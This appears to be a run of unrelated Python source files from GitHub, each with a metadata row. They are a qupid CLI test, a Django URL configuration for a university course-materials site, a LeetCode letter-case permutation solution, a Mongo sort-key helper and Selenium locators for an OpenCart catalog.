from pkg_resources import resource_filename
from click.testing import CliRunner
import pandas as pd
from qupid.cli.cli import qupid
def test_cli():
runner = CliRunner()
metadata_fpath = resource_filename("qupid", "tests/data/asd.tsv")
metadata = pd.read_table(metadata_fpath, sep="\t", index_col=0)
asd_str = (
"Diagnosed by a medical professional (doctor, physician "
"assistant)"
)
no_asd_str = "I do not have this condition"
background = metadata[metadata["asd"] == no_asd_str]
focus = metadata[metadata["asd"] == asd_str]
bg_file = "background.tsv"
focus_file = "focus.tsv"
match_file = "match.tsv"
with runner.isolated_filesystem():
background.to_csv(bg_file, sep="\t", index=True)
focus.to_csv(focus_file, sep="\t", index=True)
result = runner.invoke(qupid, [
"shuffle",
"-f", focus_file,
"-b", bg_file,
"-i", 15,
"-dc", "sex",
"-nc", "age_years", 10,
"-o", match_file
])
assert result.exit_code == 0
assert os.path.exists(match_file)
df = pd.read_table(match_file, sep="\t", index_col=0)
assert df.shape == (45, 15)
| gibsramen/qupid | qupid/tests/test_cli.py | test_cli.py | py | 1,257 | python | en | code | 11 | github-code | 50 |
21037477056 | """SansaCloud URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/4.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from SansaCloud.views import *
from Foro.views import *
urlpatterns = [
path('admin/', admin.site.urls),
path('registro.html', register),
path('login.html', custom_login),
path('logout.html', custom_logout),
path('test.html', test),
path('foro.html',foro,name='foro'),
path('addInForum.html',addInForum,name='addInForum'),
path('addInDiscussion.html',addInDiscussion,name='addInDiscussion'),
path('home.html', home, name="homepage"),
path('carreras.html', carreras),
path('ramos.html', ramos),
path('mat021.html', mat021),
path('iwi131.html', iwi131),
path('IngenieriaCivilInformatica.html', ingCivilInf),
path('mat021.html', mat021),
path('Notas Semestrales.pdf', notasSemestrales),
path('Certamen1-2014-1.pdf', c120141),
path('Certamen1-2014-2.pdf', c120142),
path('Certamen1-2015-1.pdf', c120151),
path('Certamen2-2015-2.pdf', c220152),
path('Certamen3-2014-2.pdf', c320142),
path('CertamenGlobalMat021.pdf', cgmat021),
path('Control1-2015-1.pdf', co120151),
path('Ejercicios de Inducción.pdf', ejerciciosInduccion),
path('Guía de Sumatorias y Progresiones.pdf', guiaSumyPro),
path('PautaTallerC2-1.pdf', pautaTallerC2),
path('Taller 1 Dasarrollado.pdf', Taller1Mat021),
path('Taller 2 Desarrollado.pdf', Taller2Mat021),
path('hrw130.html', hrw130),
path('fis100.html', fis100),
path('Resumen.pdf', ResumenHrw130),
path('Taller 1 Hrw130.pdf', Taller1Etica),
path('UVA1.pdf', UVA1),
path('UVA9.pdf', UVA9),
]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | SeniorZas/UniProjects | Uni Projects/SansaCloud-master/SansaCloud-master/SansaCloud/urls.py | urls.py | py | 2,384 | python | en | code | 0 | github-code | 50 |
33862856363 | # using recursion -> backtacking
# time complexity: O(n^2)
# space complexity: O(n)
class Solution:
def letterCasePermutation(self, S: str) -> List[str]:
res = []
def dfs(i, path):
if i == len(S):
res.append(path)
return
if S[i].isalpha():
dfs(i+1, path + S[i].lower())
dfs(i+1, path + S[i].upper())
else:
dfs(i+1, path + S[i])
dfs(0, '')
return res
| mykoabe/Competetive-Programming | PostCampProgress/Week1/5_letter_case_permutation.py | 5_letter_case_permutation.py | py | 509 | python | en | code | 1 | github-code | 50 |
41024672008 | """This module contains a helper for getting the sorting arguements figured
out"""
def get_sort_keys(given, allowed):
"""Check the list of given values and coerce them into the sort keys for mongo"""
keys = []
for key in given:
asc = True
if key[0] == ' ' or key[0] == '+':
asc = True
key = key[1:]
if key[0] == '-':
asc = False
key = key[1:]
if key in allowed:
keys.append('{}{}'.format(asc and '+' or '-', key))
return keys
| raghavach/beerAPI_raghu | beerpi/sort.py | sort.py | py | 543 | python | en | code | 0 | github-code | 50 |
7566053894 | class Catalog:
class Products:
products = {'css': '.product-layout'}
product_image = {'css': products['css'] + ' .image'}
product_name = {'css': products['css'] + ' .caption h4'}
class Buttons:
button_group = {'css': '.button-group'}
add_to_cart_button = {'css': button_group['css'] + ' [class="fa fa-shopping-cart"]'}
add_to_wish_list_button = {'css': button_group['css'] + ' [class="fa fa-heart"]'}
compare_product_button = {'css': button_group['css'] + '[class="fa fa-exchange"]'}
class Navigation:
list_view = {'css': '[data-original-title="List"]'}
grid_view = {'css': '[data-original-title="Grid"]'}
class Sort:
options = {'css': '#input-sort'}
by_name_A_Z = "Name (A - Z)"
by_name_Z_A = "Name (Z - A)"
by_price_low_high = "Price (Low > High)"
by_price_high_low = "Price (High > Low)"
by_raiting_highest = "Rating (Highest)"
by_raiting_lowest = "Rating (Lowest)"
by_model_A_Z = "Model (A - Z)"
by_model_Z_A = "Model (Z - A)"
class Limits:
options = {'css': '#input-limit'}
limit_15 = "15"
limit_25 = "25"
limit_50 = "50"
limit_75 = "70"
limit100 = "100" | maslovaleksandr/opencart_tests | locators/Catalog.py | Catalog.py | py | 1,284 | python | en | code | 0 | github-code | 50 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.